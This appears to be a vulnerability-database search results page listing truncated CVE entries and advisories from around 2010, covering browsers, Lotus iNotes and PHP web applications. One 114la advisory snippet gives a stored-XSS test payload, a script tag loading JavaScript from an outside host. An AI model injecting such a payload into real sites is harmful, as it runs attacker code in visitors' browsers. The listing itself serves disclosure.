4178 matches found
CVE-2010-4049
Opera before 10.63 allows remote attackers to cause a denial of service (application crash) via a Flash movie with a transparent Window Mode (aka wmode) property, which is not properly handled during navigation away from the containing HTML document...
Mozilla cross-site information disclosure via modal calls
Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 do not properly handle certain modal calls made by javascript: URLs in circumstances related to opening a new window and performing cross-domain navigation, which...
Denial of Service (DoS) Vulnerability in JP1/Desktop Navigation Built-in Database
Overview: When JP1/Desktop Navigation used in a cluster environment receives unexpected data, the built-in database process and unit abend, which may cause the management server service to fall into a denial of service (DoS) condition. Impact: A remote attacker could cause a denial of service (DoS)...
WysGui 2.3 Multiple Vulnerabilities
Exploit for php platform in category web applications...
sFileManager 24a - Local File Inclusion
sFileManager eNYe-Sec - www.enye-sec.org - www.pepelux.org. By the author: Simple File Manager SFM is a web based file management utility. It is designed to be used by those that don't wan...
sFileManager 24a - Local File Inclusion
sFileManager eNYe-Sec - www.enye-sec.org - www.pepelux.org. By the author: Simple File Manager SFM is a web based file management utility. It is designed to be used by those that don't want to use ftp or SHOULD NOT use ftp. It c...
Mozilla SSL spoofing with history.back() and history.forward()
The nsDocShell::OnRedirectStateChange function in docshell/base/nsDocShell.cpp in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, allows remote attackers to spoof the SSL security status of a document via vectors involving multiple requests, a redirect, and...
Dynamic photo gallery V1.02 SQL Injection Vulnerability
Exploit for php platform in category web applications...
114la Site Navigation Station system V1.13 XSS cross-site attack - vulnerability warning - the black bar safety net
url-submit/index.php inserts submitted data directly into the database without filtering, resulting in a persistent XSS vulnerability. Test method: in the Site Name column, fill in script src=http://www.hackqing.cn/qingexp.js /script (src is the address of your own js file, don't tell me that t...
Fedora 11 : glpi-0.72.4-2.svn11035.fc11 (2010-5188)
This version corrects several bugs. Full upstream changelog: Bug 1893: Unable to access the model of phones dictionary; Bug 1904: Vlan not add using Template; Bug 1906: Message-ID should not use $_SERVER['HTTP_HOST']; Bug 1918: configured listlimitmax not honoured; Bug 1941: Disconnecting a port...
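114la Website Navigation Site-Building System V1.13 has XSS and CSRF vulnerabilities
114la Website Navigation is currently one of the most widely used website navigation sites in China. The navigation generation system was developed in-house by 雨林木风 and has now been officially released as open source, which will help more webmasters easily build website navigation sites. url-submit/index.php inserts submitted data directly into the database without filtering, resulting in a persistent XSS vulnerability. V1.13 Vendor patch: 114la. The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version: http://www.114la.com/ In the site name field, fill in script...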
Online Notebook Manager SQL Injection Vulnerability
Exploit for php platform in category web applications. Author: L0rd CrusAd3r aka VSN. Exploit Title: Online Notebook Manager SQ...
CafeEngine CMS V2.3 SQL Injection Vulnerability
Exploit for php platform in category web applications...
Unfixed XSS vulnerability at www.gsmtrack.nl
Security researcher Xylitol submitted on 30/05/2010 a cross-site scripting (XSS) vulnerability affecting www.gsmtrack.nl, which at the time of submission ranked 269316 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 06/07/2010. It is current...
Google Chrome Multiple File Type Security Bypass
Google Chrome is a web browser developed by Google Inc. It provides rich web browsing similar to other web browsers such as Firefox, Opera, and Internet Explorer. Chrome is unique from other browsers because it follows a multi-process architecture: by default, a separate process is allocated to...
CVE-2010-0655
Use-after-free vulnerability in Google Chrome before 4.0.249.78 allows user-assisted remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors involving the display of a blocked popup window during navigation to a different web site...
CVE-2010-0276
IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 does not properly handle navigation of the "Try Lotus iNotes anyway" link from the page that reports use of an unsupported browser, which has unspecified impact and attack vectors, aka SPR LSHR7TBMQU...
Input validation
IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 does not properly handle navigation of the "Try Lotus iNotes anyway" link from the page that reports use of an unsupported browser, which has unspecified impact and attack vectors, aka SPR LSHR7TBMQU...
Safari < 4.0.4 Multiple Vulnerabilities